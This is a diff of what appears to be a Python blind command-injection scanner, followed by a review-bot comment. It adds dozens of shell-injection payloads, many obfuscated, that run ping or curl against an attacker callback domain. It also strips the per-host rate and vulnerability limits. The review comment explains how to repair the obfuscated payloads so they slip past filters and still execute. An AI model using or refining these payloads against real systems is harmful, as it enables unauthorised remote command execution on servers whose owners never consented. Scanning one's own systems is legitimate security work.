| skipped 17 lines |
18 | 18 | | from multiprocessing.dummy import Pool |
19 | 19 | | from colored import fg, bg, attr |
20 | 20 | | |
21 | | - | MAX_EXCEPTION = 3 |
22 | | - | MAX_VULNERABLE = 3 |
| 21 | + | MAX_EXCEPTION = 100 |
| 22 | + | MAX_VULNERABLE = 100 |
23 | 23 | | |
24 | 24 | | # disable "InsecureRequestWarning: Unverified HTTPS request is being made." |
25 | 25 | | from requests.packages.urllib3.exceptions import InsecureRequestWarning |
| skipped 93 lines |
119 | 119 | | if len(t_urlparse.query): |
120 | 120 | | testParams( t_urlparse, payload.strip('/') ) |
121 | 121 | | |
122 | | - | if len(t_urlparse.fragment): |
123 | | - | testFragment( t_urlparse, payload.strip('/') ) |
| 122 | + | # if len(t_urlparse.fragment): |
| 123 | + | # testFragment( t_urlparse, payload.strip('/') ) |
124 | 124 | | |
125 | 125 | | testPath( t_urlparse, payload ) |
126 | 126 | | |
| skipped 13 lines |
140 | 140 | | |
141 | 141 | | def doTest( url, method='GET', post_params='' ): |
142 | 142 | | |
143 | | - | t_realdotest.append( [url,method,post_params] ) |
| 143 | + | realDoTest( [url,method,post_params] ) |
| 144 | + | # t_realdotest.append( [url,method,post_params] ) |
144 | 145 | | return |
145 | 146 | | |
146 | 147 | | |
| skipped 10 lines |
157 | 158 | | t_urlparse = urllib.parse.urlparse(url) |
158 | 159 | | u = t_urlparse.scheme + '_' + t_urlparse.netloc |
159 | 160 | | |
160 | | - | if not u in t_exceptions: |
161 | | - | t_exceptions[u] = 0 |
162 | | - | if t_exceptions[u] >= MAX_EXCEPTION: |
163 | | - | if _verbose >= 3 and _verbose < 4: |
164 | | - | print("skip too many exceptions %s" % t_urlparse.netloc) |
165 | | - | return |
| 161 | + | # if not u in t_exceptions: |
| 162 | + | # t_exceptions[u] = 0 |
| 163 | + | # if t_exceptions[u] >= MAX_EXCEPTION: |
| 164 | + | # if _verbose >= 3 and _verbose < 4: |
| 165 | + | # print("skip too many exceptions %s" % t_urlparse.netloc) |
| 166 | + | # return |
166 | 167 | | |
167 | | - | if not u in t_vulnerable: |
168 | | - | t_vulnerable[u] = 0 |
169 | | - | if t_vulnerable[u] >= MAX_VULNERABLE: |
170 | | - | if _verbose >= 3 and _verbose < 4: |
171 | | - | print("skip already vulnerable %s" % t_urlparse.netloc) |
172 | | - | return |
| 168 | + | # if not u in t_vulnerable: |
| 169 | + | # t_vulnerable[u] = 0 |
| 170 | + | # if t_vulnerable[u] >= MAX_VULNERABLE: |
| 171 | + | # if _verbose >= 3 and _verbose < 4: |
| 172 | + | # print("skip already vulnerable %s" % t_urlparse.netloc) |
| 173 | + | # return |
173 | 174 | | |
174 | 175 | | try: |
175 | 176 | | if method == 'POST': |
| skipped 1 lines |
177 | 178 | | else: |
178 | 179 | | r = requests.head( url, headers=t_custom_headers, timeout=5, verify=False ) |
179 | 180 | | except Exception as e: |
180 | | - | t_exceptions[u] = t_exceptions[u] + 1 |
| 181 | + | # t_exceptions[u] = t_exceptions[u] + 1 |
181 | 182 | | if _verbose >= 3 and _verbose < 4: |
182 | 183 | | sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) ) |
183 | 184 | | return |
| skipped 137 lines |
321 | 322 | | |
322 | 323 | | if not n_payloads: |
323 | 324 | | t_payloads = [ |
324 | | - | '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__', |
325 | | - | '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__', |
326 | | - | '%0a%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%0a', |
327 | | - | '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__%0A', |
328 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__', |
329 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__', |
330 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__|', |
331 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__;', |
332 | | - | ';curl$IFSrce___RANDOM_STR__.__DOMAIN__;', |
333 | | - | ')|curl%20rce___RANDOM_STR__.__DOMAIN__', |
334 | | - | ')|curl%20rce___RANDOM_STR__.__DOMAIN__;', |
335 | | - | ');curl%20rce___RANDOM_STR__.__DOMAIN__', |
336 | | - | ');curl%20rce___RANDOM_STR__.__DOMAIN__|', |
337 | | - | ');curl%20rce___RANDOM_STR__.__DOMAIN__;', |
338 | | - | '`curl%20rce___RANDOM_STR__.__DOMAIN__`', |
339 | | - | '||curl%20rce___RANDOM_STR__.__DOMAIN__|', |
340 | | - | '||curl%20rce___RANDOM_STR__.__DOMAIN__;', |
341 | | - | '||curl$IFSrce___RANDOM_STR__.__DOMAIN__;', |
342 | | - | '|%20curl%20rce___RANDOM_STR__.__DOMAIN__', |
343 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__', |
344 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__|', |
345 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__;', |
346 | | - | ';|curl%20rce___RANDOM_STR__.__DOMAIN__|', |
347 | | - | ';%20curl%20rce___RANDOM_STR__.__DOMAIN__', |
348 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__', |
349 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__|', |
350 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__;', |
351 | | - | '$;curl%20rce___RANDOM_STR__.__DOMAIN__', |
352 | | - | '$(curl%20rce___RANDOM_STR__.__DOMAIN__)', |
353 | | - | '&%20curl%20rce___RANDOM_STR__.__DOMAIN__', |
354 | | - | '%26%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%26', |
355 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__\n', |
356 | | - | '\ncurl%20rce___RANDOM_STR__.__DOMAIN__|', |
357 | | - | '\ncurl%20rce___RANDOM_STR__.__DOMAIN__;', |
358 | | - | '|ncurl%20rce___RANDOM_STR__.__DOMAIN__\n', |
359 | | - | '\ncurl%20rce___RANDOM_STR__.__DOMAIN__\n', |
360 | | - | ';system(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')', |
361 | | - | ';exec(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')', |
362 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__\n', |
363 | | - | '`curl%20rce___RANDOM_STR__.__DOMAIN__`', |
364 | | - | '%0acurl%20rce___RANDOM_STR__.__DOMAIN__%0a', |
| 325 | + | 'rce___RANDOM_STR__.__DOMAIN__', |
| 326 | + | '$;ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 327 | + | '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A', |
| 328 | + | '%0Aping%20rce___RANDOM_STR__.__DOMAIN__', |
| 329 | + | '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a', |
| 330 | + | '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a', |
| 331 | + | '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26', |
| 332 | + | '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26', |
| 333 | + | '&%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 334 | + | ');ping${IFS}rce___RANDOM_STR__.__DOMAIN__', |
| 335 | + | ');ping<rce___RANDOM_STR__.__DOMAIN__', |
| 336 | + | ");p'i'n'g'${IFS}rce___RANDOM_STR__.__DOMAIN__%23", |
| 337 | + | ');p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 338 | + | ');{p\i\n\g,rce___RANDOM_STR__.__DOMAIN__}%23', |
| 339 | + | ');{ping,rce___RANDOM_STR__.__DOMAIN__}', |
| 340 | + | ');ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 341 | + | ');ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 342 | + | ');ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 343 | + | ')|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 344 | + | ')|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 345 | + | ';{ping;rce___RANDOM_STR__.__DOMAIN__}', |
| 346 | + | ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 347 | + | ';ping${IFS}rce___RANDOM_STR__.__DOMAIN__;', |
| 348 | + | ';ping<rce___RANDOM_STR__.__DOMAIN__;', |
| 349 | + | ';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 350 | + | ';{ping,rce___RANDOM_STR__.__DOMAIN__};', |
| 351 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 352 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 353 | + | ";p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__;", |
| 354 | + | ';p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 355 | + | ';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 356 | + | ';p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 357 | + | ';p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 358 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 359 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 360 | + | ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 361 | + | ';|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 362 | + | '\nping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 363 | + | '\nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 364 | + | '\nping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 365 | + | '`ping%20rce___RANDOM_STR__.__DOMAIN__`', |
| 366 | + | '|%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 367 | + | '|\nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 368 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 369 | + | '|ping${IFS}rce___RANDOM_STR__.__DOMAIN__;', |
| 370 | + | '|ping<rce___RANDOM_STR__.__DOMAIN__;', |
| 371 | + | '|{ping,rce___RANDOM_STR__.__DOMAIN__};', |
| 372 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 373 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 374 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 375 | + | '||ping$IFSrce___RANDOM_STR__.__DOMAIN__;', |
| 376 | + | '||ping<rce___RANDOM_STR__.__DOMAIN__;', |
| 377 | + | '||{ping,rce___RANDOM_STR__.__DOMAIN__};', |
| 378 | + | '||ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 379 | + | '||ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 380 | + | "||p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__%23", |
| 381 | + | '||p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 382 | + | '||p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 383 | + | '||p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 384 | + | '||p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 385 | + | |
| 386 | + | # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__', |
| 387 | + | # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__', |
| 388 | + | # '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a', |
| 389 | + | # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A', |
| 390 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 391 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 392 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 393 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 394 | + | # ';ping$IFSrce___RANDOM_STR__.__DOMAIN__;', |
| 395 | + | # ')|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 396 | + | # ')|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 397 | + | # ');ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 398 | + | # ');ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 399 | + | # ');ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 400 | + | # '`ping%20rce___RANDOM_STR__.__DOMAIN__`', |
| 401 | + | # '||ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 402 | + | # '||ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 403 | + | # '||ping$IFSrce___RANDOM_STR__.__DOMAIN__;', |
| 404 | + | # '|%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 405 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 406 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 407 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 408 | + | # ';|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 409 | + | # ';%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 410 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 411 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 412 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 413 | + | # '$;ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 414 | + | # '$(ping%20rce___RANDOM_STR__.__DOMAIN__)', |
| 415 | + | # '&%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 416 | + | # '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26', |
| 417 | + | # '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26', |
| 418 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 419 | + | # '\nping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 420 | + | # '\nping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 421 | + | # '|nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 422 | + | # '\nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 423 | + | # ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 424 | + | # ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 425 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 426 | + | # '`ping%20rce___RANDOM_STR__.__DOMAIN__`', |
| 427 | + | # '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a', |
365 | 428 | | ] |
366 | 429 | | |
367 | 430 | | for i,payload in enumerate(t_payloads): |
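Review bot: The four `p\i\n\g` payloads in the new t_payloads list (e.g. `';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;'`) are broken before they reach the target, because Python decodes `\n` inside a normal string literal as a newline, so the shell receives `p\i`, a line break, then `\g rce…` — two unknown commands (`pi` and `g`) and no DNS lookup of the callback domain. Writing them as raw strings, e.g. `r';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;'`, keeps all three backslashes for the shell to strip, which is the quoting-based obfuscation these entries are meant to exercise. The `ping<rce___RANDOM_STR__.__DOMAIN__` variants (four entries) are also dead on a POSIX shell: `<` redirects stdin from a file of that name, the redirection fails because no such file exists, and ping is never run with the host as an argument. `';{ping;rce___RANDOM_STR__.__DOMAIN__}'` is parsed as the commands `{ping` and `rce…}` (a brace group needs whitespace after `{`), so it should be dropped or changed to the `{ping,…}` brace-expansion form used by the neighbouring entries. The `\i` and `\g` sequences are additionally invalid escapes that CPython keeps literally but flags with a SyntaxWarning from 3.12 on; the raw-string form silences that as well.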
| skipped 42 lines |
410 | 473 | | sys.stdout.write( '[+] testing...\n' ) |
411 | 474 | | |
412 | 475 | | |
413 | | - | random.shuffle(t_totest) |
| 476 | + | # random.shuffle(t_totest) |
414 | 477 | | # print("\n".join(t_totest)) |
415 | 478 | | # exit() |
416 | 479 | | |
| skipped 31 lines |
448 | 511 | | |
449 | 512 | | |
450 | 513 | | |
451 | | - | t_exceptions = {} |
452 | | - | t_vulnerable = {} |
453 | | - | t_multiproc = { |
454 | | - | 'n_current': 0, |
455 | | - | 'n_total': len(t_realdotest), |
456 | | - | 'u_max_length': u_max_length+5, |
457 | | - | 'd_output': d_output, |
458 | | - | 'f_output': f_output, |
459 | | - | } |
| 514 | + | # t_exceptions = {} |
| 515 | + | # t_vulnerable = {} |
| 516 | + | # t_multiproc = { |
| 517 | + | # 'n_current': 0, |
| 518 | + | # 'n_total': len(t_realdotest), |
| 519 | + | # 'u_max_length': u_max_length+5, |
| 520 | + | # 'd_output': d_output, |
| 521 | + | # 'f_output': f_output, |
| 522 | + | # } |
460 | 523 | | |
461 | | - | def realDoWork(): |
462 | | - | while True: |
463 | | - | params = q.get() |
464 | | - | realDoTest( params ) |
465 | | - | q.task_done() |
| 524 | + | # def realDoWork(): |
| 525 | + | # while True: |
| 526 | + | # params = q.get() |
| 527 | + | # realDoTest( params ) |
| 528 | + | # q.task_done() |
466 | 529 | | |
467 | | - | q = Queue( _threads*2 ) |
| 530 | + | # q = Queue( _threads*2 ) |
468 | 531 | | |
469 | | - | for i in range(_threads): |
470 | | - | t = Thread( target=realDoWork ) |
471 | | - | t.daemon = True |
472 | | - | t.start() |
| 532 | + | # for i in range(_threads): |
| 533 | + | # t = Thread( target=realDoWork ) |
| 534 | + | # t.daemon = True |
| 535 | + | # t.start() |
473 | 536 | | |
474 | | - | try: |
475 | | - | for url in t_realdotest: |
476 | | - | q.put( url ) |
477 | | - | q.join() |
478 | | - | except KeyboardInterrupt: |
479 | | - | sys.exit(1) |
| 537 | + | # try: |
| 538 | + | # for url in t_realdotest: |
| 539 | + | # q.put( url ) |
| 540 | + | # q.join() |
| 541 | + | # except KeyboardInterrupt: |
| 542 | + | # sys.exit(1) |
480 | 543 | | |
481 | 544 | | |
482 | 545 | | |
| skipped 1 lines |